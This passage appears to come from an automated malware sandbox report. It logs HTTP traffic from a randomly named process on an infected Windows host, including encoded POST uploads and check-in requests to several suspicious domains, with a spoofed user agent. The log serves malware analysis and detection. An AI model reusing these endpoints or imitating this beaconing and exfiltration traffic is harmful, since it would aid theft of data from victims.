server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
24	192.168.2.4	58117	200.58.111.42	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:29.736187935 CEST	421	OUT	GET /ydsb/?ZXzt1jdX=5MonW/+sdj9S4Qi9EuAiwzCb3teTJ4mp2FYtUqDRNpZKZK4yIAJ/199x4+50cXOASEslm+CgFxsG9ylKFHmgriXfA832cO2sv57t9clCzJ2/NV8benXuPPs=&fVU8=HRzx HTTP/1.1 Host: www.pilibit.site Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:05:30.463216066 CEST	360	IN	HTTP/1.1 404 Not Found Date: Sat, 31 Aug 2024 12:05:30 GMT Server: Apache Content-Length: 196 Connection: close Content-Type: text/html; charset=iso-8859-1 Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
25	192.168.2.4	58118	13.248.169.48	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:35.512537956 CEST	700	OUT	POST /7mxg/ HTTP/1.1 Host: www.astrocloud.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.astrocloud.shop Referer: http://www.astrocloud.shop/7mxg/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 43 53 76 72 4b 6e 48 41 65 33 4f 56 6e 56 70 68 34 31 6c 79 34 58 77 41 61 72 75 69 42 6b 7a 6b 54 7a 4c 51 39 73 76 36 74 4a 7a 36 6e 4b 58 39 69 56 37 6b 54 74 71 4b 66 46 41 6b 63 61 43 30 63 63 38 6d 6e 71 48 57 43 2b 33 53 54 32 6e 44 67 70 49 6d 77 57 36 67 6f 67 6b 34 6d 6e 66 76 7a 63 33 48 6f 62 6d 74 58 34 4e 69 62 59 71 44 63 2b 38 49 75 68 35 38 49 75 64 55 78 43 39 77 34 4f 4f 71 6e 51 66 43 6f 56 4e 4a 34 70 66 32 7a 4c 67 66 6b 35 44 45 2f 63 31 4d 63 6d 4b 77 30 2f 56 78 6c 63 4e 6c 57 49 75 6c 57 41 69 55 35 76 51 58 65 70 4a 79 62 6b 4b 67 44 2b 69 6a 5a 51 3d 3d Data Ascii: ZXzt1jdX=CSvrKnHAe3OVnVph41ly4XwAaruiBkzkTzLQ9sv6tJz6nKX9iV7kTtqKfFAkcaC0cc8mnqHWC+3ST2nDgpImwW6gogk4mnfvzc3HobmtX4NibYqDc+8Iuh58IudUxC9w4OOqnQfCoVNJ4pf2zLgfk5DE/c1McmKw0/VxlcNlWIulWAiU5vQXepJybkKgD+ijZQ==

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
26	192.168.2.4	58119	13.248.169.48	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:38.053417921 CEST	720	OUT	POST /7mxg/ HTTP/1.1 Host: www.astrocloud.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.astrocloud.shop Referer: http://www.astrocloud.shop/7mxg/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 43 53 76 72 4b 6e 48 41 65 33 4f 56 32 45 5a 68 36 57 4e 79 76 6e 77 42 47 37 75 69 4b 45 7a 67 54 7a 33 51 39 74 71 33 75 37 58 36 6b 71 6e 39 6a 51 48 6b 51 74 71 4b 59 31 41 68 59 61 44 32 63 63 78 54 6e 76 2f 57 43 2b 7a 53 54 30 76 44 67 61 67 6e 78 47 36 69 6b 41 6b 36 34 58 66 76 7a 63 33 48 6f 62 44 41 58 2b 6c 69 59 70 61 44 63 61 49 4c 6f 52 35 2f 59 2b 64 55 31 43 39 30 34 4f 50 39 6e 56 32 76 6f 58 31 4a 34 6f 76 32 79 66 55 51 74 35 44 34 68 73 30 4c 4d 6e 2f 68 74 63 77 64 69 63 6c 70 64 73 71 58 54 47 7a 4f 6f 65 78 41 4d 70 74 42 47 6a 44 55 4f 39 66 71 43 62 52 54 6e 67 57 51 57 68 68 38 42 2b 2b 2b 44 67 4d 46 32 37 4d 3d Data Ascii: ZXzt1jdX=CSvrKnHAe3OV2EZh6WNyvnwBG7uiKEzgTz3Q9tq3u7X6kqn9jQHkQtqKY1AhYaD2ccxTnv/WC+zST0vDgagnxG6ikAk64Xfvzc3HobDAX+liYpaDcaILoR5/Y+dU1C904OP9nV2voX1J4ov2yfUQt5D4hs0LMn/htcwdiclpdsqXTGzOoexAMptBGjDUO9fqCbRTngWQWhh8B+++DgMF27M=

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
27	192.168.2.4	58120	13.248.169.48	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:40.597640991 CEST	10802	OUT	POST /7mxg/ HTTP/1.1 Host: www.astrocloud.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.astrocloud.shop Referer: http://www.astrocloud.shop/7mxg/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 43 53 76 72 4b 6e 48 41 65 33 4f 56 32 45 5a 68 36 57 4e 79 76 6e 77 42 47 37 75 69 4b 45 7a 67 54 7a 33 51 39 74 71 33 75 37 66 36 6e 5a 76 39 69 7a 76 6b 52 74 71 4b 58 6c 41 67 59 61 44 33 63 63 70 58 6e 76 37 73 43 37 76 53 51 58 33 44 70 4c 67 6e 37 47 36 69 73 67 6b 2f 6d 6e 65 33 7a 63 6e 44 6f 62 54 41 58 2b 6c 69 59 72 43 44 65 4f 38 4c 71 52 35 38 49 75 64 41 78 43 38 54 34 4f 58 74 6e 56 36 5a 6f 6e 56 4a 34 49 2f 32 77 71 67 51 69 35 44 41 67 73 30 70 4d 6e 69 35 74 63 73 6e 69 63 67 47 64 72 69 58 53 69 71 49 39 39 56 74 66 2f 70 47 51 55 32 2f 4f 61 50 51 62 59 52 72 6d 52 4b 4f 47 7a 77 55 45 4e 76 71 51 44 46 47 73 73 69 5a 35 35 4f 79 76 6e 45 30 57 68 6e 5a 31 6f 6a 31 47 67 46 33 52 4c 46 75 44 68 37 76 44 69 54 78 45 38 6d 68 4a 65 57 74 46 51 7a 52 50 51 30 6d 61 52 78 54 59 63 37 63 56 45 7a 2f 64 52 72 41 47 49 76 49 68 6f 57 63 34 49 2b 76 6f 6e 41 67 77 64 79 54 72 66 73 48 6c 61 49 49 36 52 50 57 5a 75 77 52 76 71 57 54 31 47 42 45 4d 6f 56 49 44 [TRUNCATED] Data Ascii: ZXzt1jdX=CSvrKnHAe3OV2EZh6WNyvnwBG7uiKEzgTz3Q9tq3u7f6nZv9izvkRtqKXlAgYaD3ccpXnv7sC7vSQX3DpLgn7G6isgk/mne3zcnDobTAX+liYrCDeO8LqR58IudAxC8T4OXtnV6ZonVJ4I/2wqgQi5DAgs0pMni5tcsnicgGdriXSiqI99Vtf/pGQU2/OaPQbYRrmRKOGzwUENvqQDFGssiZ55OyvnE0WhnZ1oj1GgF3RLFuDh7vDiTxE8mhJeWtFQzRPQ0maRxTYc7cVEz/dRrAGIvIhoWc4I+vonAgwdyTrfsHlaII6RPWZuwRvqWT1GBEMoVID92XrPoYCGFoPeCRaUv7WsKcnH1DKCvDZHkeFL/t6GlEPql6O5+4YvunEZi2bZJc4VqzPBHeYvYNHWfoBN5LNjn6JE2vUwT0o00g/yIhiC2EZ4qjZu9bcGca1XmUXeJ/Ym1EaJDdkjHeUam+ikU8qQ5udvMVeb/LFPTInpff5XegcjpaQBdhaxFEokkRLXxfp+fK3ud0Zm0TtAhDGydm9zKSAy8sINDEk61gDifEVY+cLnyGD8/4h14vf++neTDaqqoTaKwPuL0xyA1b3KYHlBf9lal2MlfNlvr20Z+WgEpRl7fNDlNSwO8TSlU6VD/w7JDspM1mu/AeiY4UJIyuJ8Y+ZeMzsz1b6ejKGeu6G7rAnZTmrOUfZvs57L6Gud7IITwaBH0S/26PMc1DTx92cHZyNgti71ltzTUTn2NTBuYSB3gjRaVaqK2zUPNWB/2Xgs7cUFKqsfLY3OiowawTdJ2fwACw/PFBSSJwyM+n8IC6WeUUgXRuQshsmC7p/ejTzBWie3k7SrBMw6Veq0394T/oYZypzcF2F0ZSkONUzhbK8GSwzDxtHQKokCfaVIEt6XsPK7Kx4cIdpFATERccEPD0sdshP7ZCxxgmCnU+DpGn+wRCRBk+dyO8B24oGozNvyaMxZjEeH0aaJD+go9kuGN4uAGHUogt8eH [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
28	192.168.2.4	58121	13.248.169.48	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:43.145845890 CEST	424	OUT	GET /7mxg/?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4= HTTP/1.1 Host: www.astrocloud.shop Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:05:43.629129887 CEST	394	IN	HTTP/1.1 200 OK Server: openresty Date: Sat, 31 Aug 2024 12:05:43 GMT Content-Type: text/html Content-Length: 254 Connection: close Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 73 63 72 69 70 74 3e 77 69 6e 64 6f 77 2e 6f 6e 6c 6f 61 64 3d 66 75 6e 63 74 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 6c 6f 63 61 74 69 6f 6e 2e 68 72 65 66 3d 22 2f 6c 61 6e 64 65 72 3f 66 56 55 38 3d 48 52 7a 78 26 5a 58 7a 74 31 6a 64 58 3d 50 51 48 4c 4a 52 4b 77 61 55 50 6a 77 78 68 6b 32 47 59 51 7a 57 52 38 52 34 44 52 47 7a 79 43 66 44 44 35 73 4f 76 46 74 4b 6a 47 38 5a 44 37 6f 67 2f 2b 4e 39 71 45 62 6e 45 4e 57 61 48 34 49 75 64 44 67 72 6e 6d 51 4d 66 33 56 32 4c 69 69 5a 4a 34 34 56 43 44 67 68 67 56 31 32 6d 2f 6b 39 62 6e 70 36 62 32 46 4a 70 32 61 70 79 57 4e 65 68 35 31 77 34 3d 22 7d 3c 2f 73 63 72 69 70 74 3e 3c 2f 68 65 61 64 3e 3c 2f 68 74 6d 6c 3e Data Ascii: <!DOCTYPE html><html><head><script>window.onload=function(){window.location.href="/lander?fVU8=HRzx&ZXzt1jdX=PQHLJRKwaUPjwxhk2GYQzWR8R4DRGzyCfDD5sOvFtKjG8ZD7og/+N9qEbnENWaH4IudDgrnmQMf3V2LiiZJ44VCDghgV12m/k9bnp6b2FJp2apyWNeh51w4="}</script></head></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
29	192.168.2.4	58122	52.71.57.184	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:48.872093916 CEST	685	OUT	POST /49cz/ HTTP/1.1 Host: www.rantup.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.rantup.com Referer: http://www.rantup.com/49cz/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 75 71 4c 4b 76 61 35 44 58 58 41 6f 51 6b 41 54 72 55 47 72 66 70 42 37 77 43 34 73 6f 72 7a 63 33 44 36 7a 44 42 58 62 35 33 6c 39 79 73 54 35 65 57 33 75 66 6d 67 33 59 6f 44 63 6b 70 36 7a 5a 6c 35 72 52 73 4b 70 52 59 59 57 66 4f 63 7a 36 6c 45 4d 64 53 33 62 44 41 73 50 4e 4f 77 72 77 75 75 32 32 65 50 53 71 34 43 50 65 41 35 4a 50 4f 76 6a 78 32 41 41 57 30 41 69 4d 33 74 4e 72 76 30 4b 78 79 4c 79 57 72 59 57 4b 76 48 57 71 5a 72 78 78 61 32 55 39 67 61 38 35 2b 5a 52 44 49 32 41 55 63 30 38 65 6d 53 6e 79 34 5a 6b 55 6e 5a 6c 46 6a 70 61 45 2f 57 32 34 48 77 34 37 67 3d 3d Data Ascii: ZXzt1jdX=uqLKva5DXXAoQkATrUGrfpB7wC4sorzc3D6zDBXb53l9ysT5eW3ufmg3YoDckp6zZl5rRsKpRYYWfOcz6lEMdS3bDAsPNOwrwuu22ePSq4CPeA5JPOvjx2AAW0AiM3tNrv0KxyLyWrYWKvHWqZrxxa2U9ga85+ZRDI2AUc08emSny4ZkUnZlFjpaE/W24Hw47g==
Aug 31, 2024 14:05:49.402790070 CEST	182	IN	HTTP/1.0 404 Not Found cache-control: no-cache content-type: text/html x-reason: UnsupportedMethod Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Not Found</title></head><body>404 Not Found</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
30	192.168.2.4	58123	52.71.57.184	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:51.410881996 CEST	705	OUT	POST /49cz/ HTTP/1.1 Host: www.rantup.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 225 Cache-Control: no-cache Origin: http://www.rantup.com Referer: http://www.rantup.com/49cz/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 75 71 4c 4b 76 61 35 44 58 58 41 6f 51 45 51 54 6e 58 2b 72 4b 5a 42 34 75 53 34 73 69 4c 7a 51 33 44 2b 7a 44 45 6e 4c 35 43 56 39 38 74 50 35 4d 58 33 75 63 6d 67 33 4d 59 43 57 35 35 36 6b 5a 6c 31 6a 52 74 32 70 52 59 4d 57 66 4b 59 7a 37 55 46 61 63 43 33 5a 4b 67 73 33 44 75 77 72 77 75 75 32 32 65 61 4a 71 38 6d 50 65 51 4a 4a 64 2f 76 67 34 57 41 44 66 55 41 69 62 6e 73 47 72 76 31 66 78 33 75 66 57 70 77 57 4b 74 66 57 71 74 2f 32 34 61 32 57 77 41 62 57 38 2b 49 71 4d 36 4f 49 58 64 6b 2b 66 57 43 7a 36 65 49 2b 46 57 34 79 58 6a 4e 70 5a 34 66 43 31 45 4e 78 67 6e 76 53 61 79 31 70 55 79 70 47 66 2f 4f 2f 4e 44 31 2b 58 52 6b 3d Data Ascii: ZXzt1jdX=uqLKva5DXXAoQEQTnX+rKZB4uS4siLzQ3D+zDEnL5CV98tP5MX3ucmg3MYCW556kZl1jRt2pRYMWfKYz7UFacC3ZKgs3Duwrwuu22eaJq8mPeQJJd/vg4WADfUAibnsGrv1fx3ufWpwWKtfWqt/24a2WwAbW8+IqM6OIXdk+fWCz6eI+FW4yXjNpZ4fC1ENxgnvSay1pUypGf/O/ND1+XRk=
Aug 31, 2024 14:05:51.863382101 CEST	182	IN	HTTP/1.0 404 Not Found cache-control: no-cache content-type: text/html x-reason: UnsupportedMethod Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Not Found</title></head><body>404 Not Found</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
31	192.168.2.4	58124	52.71.57.184	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:53.959673882 CEST	10787	OUT	POST /49cz/ HTTP/1.1 Host: www.rantup.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 10305 Cache-Control: no-cache Origin: http://www.rantup.com Referer: http://www.rantup.com/49cz/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 75 71 4c 4b 76 61 35 44 58 58 41 6f 51 45 51 54 6e 58 2b 72 4b 5a 42 34 75 53 34 73 69 4c 7a 51 33 44 2b 7a 44 45 6e 4c 35 43 64 39 38 66 48 35 65 30 76 75 54 47 67 33 51 49 43 56 35 35 37 6d 5a 6c 39 6e 52 74 36 54 52 62 30 57 65 70 51 7a 79 47 39 61 54 43 33 5a 48 41 73 4d 4e 4f 77 79 77 75 2b 71 32 65 4b 4a 71 38 6d 50 65 54 52 4a 4b 2b 76 67 2b 57 41 41 57 30 41 75 4d 33 73 75 72 76 39 50 78 33 72 69 57 34 51 57 50 39 50 57 35 49 72 32 33 61 32 59 7a 41 62 4f 38 2b 45 31 4d 36 54 7a 58 64 51 51 66 55 65 7a 34 4b 64 50 52 48 52 6f 4b 42 42 47 46 62 72 48 39 45 52 4a 6b 6b 2f 51 61 6a 30 70 41 78 46 77 56 4a 62 64 59 78 64 50 43 6b 74 4f 49 73 57 68 2f 48 54 49 79 67 34 33 75 71 79 62 46 77 41 64 2b 6c 61 33 4d 6e 56 4a 41 31 58 33 30 4a 6b 56 63 45 51 59 62 37 41 44 32 70 33 32 44 66 4d 59 37 6e 76 59 79 44 47 4d 64 48 45 38 6c 34 5a 65 53 50 72 72 66 75 6e 4a 6e 31 42 5a 4d 42 70 79 6c 73 33 73 34 67 34 48 77 35 55 58 46 2f 68 69 46 34 6b 46 53 69 41 47 64 4f 57 58 66 [TRUNCATED] Data Ascii: ZXzt1jdX=uqLKva5DXXAoQEQTnX+rKZB4uS4siLzQ3D+zDEnL5Cd98fH5e0vuTGg3QICV557mZl9nRt6TRb0WepQzyG9aTC3ZHAsMNOwywu+q2eKJq8mPeTRJK+vg+WAAW0AuM3surv9Px3riW4QWP9PW5Ir23a2YzAbO8+E1M6TzXdQQfUez4KdPRHRoKBBGFbrH9ERJkk/Qaj0pAxFwVJbdYxdPCktOIsWh/HTIyg43uqybFwAd+la3MnVJA1X30JkVcEQYb7AD2p32DfMY7nvYyDGMdHE8l4ZeSPrrfunJn1BZMBpyls3s4g4Hw5UXF/hiF4kFSiAGdOWXfPVl5bYnPn47/vEjfizwP5P6UpJIorqqEYedpEg4Om2EkXiXd7r3AidzaeMBuCadEWrb/Ly38mdNC//rBvca0wvVFFumqKln58GIQ1Z+La6NYi59IAdICm2rkV+biIWx/A5+gzTO1MhH7DMOAZirH254cBSjbQAwc7thxVElVWqwPUI1CIaZu1S05JpjtbZ5MySxnyoNtQTvOHj3QppTDfapUL807RekvB2jpScl2R6fRqphO/3U/0RCLihmeUwCr+VaEZNfB1YSTSNldAmoVY38d9H92p6k8DrDlzVbWNdDFxcTdTvLls6W82nZKe1etmjPsn1WD48VPxAVd9qBp7WRTNYaC2v0CNKO+Q7llDSPgwc4Gez5lN/A8YIG2Yfo8bTxcOoD97OfbolkGZaJg04C4Xo5JO3a+wLYLSX7jYsiJlEG6e81apVcWt+jc7uMbzzCunpjYz1qcrxYGbhbpz0InPIXoHHq7iZYObcny4UgiAMI2c9TvPfE2AB0XAzessWclYT4sL8rqOXI1dOstznmF0aXwxPFNrYsvINEZ+KQD6QC6TKe6JqWQXRfwIcFFqyO0DJS3iQuoj8fuQT51s3nIMAFwDSwwyJ3QoNOh2sqB1r6U8oD9LDI1YVIux8ubcuWVFVlaFeC6k9WtMW4ls1Vk2tQsUuHLG1 [TRUNCATED]
Aug 31, 2024 14:05:54.420572996 CEST	182	IN	HTTP/1.0 404 Not Found cache-control: no-cache content-type: text/html x-reason: UnsupportedMethod Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <html><head><title>Not Found</title></head><body>404 Not Found</body></html>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
32	192.168.2.4	58125	52.71.57.184	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:05:56.499648094 CEST	419	OUT	GET /49cz/?ZXzt1jdX=jojqsqROcSZ/YEZnqnzfA751mBAelv+z1FKsCArF5g8fu/bWNXnvEEANdKHh77itbEpRc/umBoU8ELsN52AVYzrBAQ0zHIll5d6B3+Pe+PauASdNc9uZplY=&fVU8=HRzx HTTP/1.1 Host: www.rantup.com Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Connection: close User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1
Aug 31, 2024 14:05:56.970454931 CEST	168	IN	HTTP/1.1 302 Found content-length: 0 date: Sat, 31 Aug 2024 12:05:56 GMT location: https://www.hugedomains.com/domain_profile.cfm?d=rantup.com connection: close

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
33	192.168.2.4	58126	45.113.201.77	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
Aug 31, 2024 14:06:02.450965881 CEST	700	OUT	POST /90p1/ HTTP/1.1 Host: www.sssqqq07-22.fun Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,/;q=0.8 Accept-Language: en-US,en;q=0.9 Accept-Encoding: gzip, deflate, br Content-Type: application/x-www-form-urlencoded Connection: close Content-Length: 205 Cache-Control: no-cache Origin: http://www.sssqqq07-22.fun Referer: http://www.sssqqq07-22.fun/90p1/ User-Agent: SAMSUNG-GT-S5222/1.0 NetFront/4.2 Profile/MIDP-2.0 Configuration/CLDC-1.1 Data Raw: 5a 58 7a 74 31 6a 64 58 3d 42 58 36 65 6b 76 48 6a 49 45 52 53 50 34 51 32 48 46 69 58 34 63 53 64 46 53 49 33 6e 4d 71 43 5a 2b 2b 57 45 55 4b 74 6e 74 75 54 6d 67 6c 30 2f 4f 57 74 6d 77 56 35 75 34 6f 55 7a 57 74 35 6f 48 68 31 63 57 65 46 6f 51 33 6d 58 72 46 41 31 69 6a 38 30 48 43 31 35 56 32 39 39 4d 6d 2b 69 46 59 43 6e 2f 4a 68 4c 79 31 61 75 6d 6f 30 4b 59 63 51 47 43 58 52 6f 32 44 45 5a 6f 67 76 4e 35 66 62 34 53 39 71 4c 4b 50 78 51 6c 57 34 62 66 69 6d 54 74 74 51 50 68 6e 44 55 38 44 38 73 39 4b 4d 33 68 41 7a 43 54 6f 6e 30 72 50 76 48 4f 55 68 52 76 4a 74 46 4f 31 51 2f 4b 6e 46 34 67 3d 3d Data Ascii: ZXzt1jdX=BX6ekvHjIERSP4Q2HFiX4cSdFSI3nMqCZ++WEUKtntuTmgl0/OWtmwV5u4oUzWt5oHh1cWeFoQ3mXrFA1ij80HC15V299Mm+iFYCn/JhLy1aumo0KYcQGCXRo2DEZogvN5fb4S9qLKPxQlW4bfimTttQPhnDU8D8s9KM3hAzCTon0rPvHOUhRvJtFO1Q/KnF4g==
Aug 31, 2024 14:06:03.316452026 CEST	340	IN	HTTP/1.1 404 NOTOK Date: Sat, 31 Dec 2005 23:59:59 GMT Content-Type: text/html;charset=GB2312 Cache-Control: no-cache, no-store, must-revalidate Pragma: no-cache Expires: 0 Data Raw: 0d 0a 3c 66 72 61 6d 65 73 65 74 20 66 72 61 6d 65 73 70 61 63 69 6e 67 3d 22 30 22 20 62 6f 72 64 65 72 3d 22 30 22 20 72 6f 77 73 3d 22 30 22 20 66 72 61 6d 65 62 6f 72 64 65 72 3d 22 30 22 3e 0d 0a 3c 66 72 61 6d 65 20 6e 61 6d 65 3d 22 6d 61 69 6e 22 20 73 72 63 3d 22 68 74 74 70 3a 2f 2f 35 38 2e 32 32 30 2e 33 32 2e 32 31 30 3a 39 38 2f 22 20 73 63 72 6f 6c 6c 69 6e 67 3d 22 61 75 74 6f 22 20 6e 6f 72 65 73 69 7a 65 3e 0d 0a 3c 2f 66 72 61 6d 65 73 65 74 3e 0d 0a 00 Data Ascii: <frameset framespacing="0" border="0" rows="0" frameborder="0"><frame name="main" src="http://58.220.32.210:98/" scrolling="auto" noresize></frameset>

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
34	192.168.2.4	58127	45.113.201.77	80	3004	C:\Program Files (x86)\gOMvnPgwymzwrUKagBcKAGBQnssIpMkiBitvpAMRpiVtopMnbYPqzc\aAqvujXSGNo.exe

Timestamp	Bytes transferred	Direction	Data
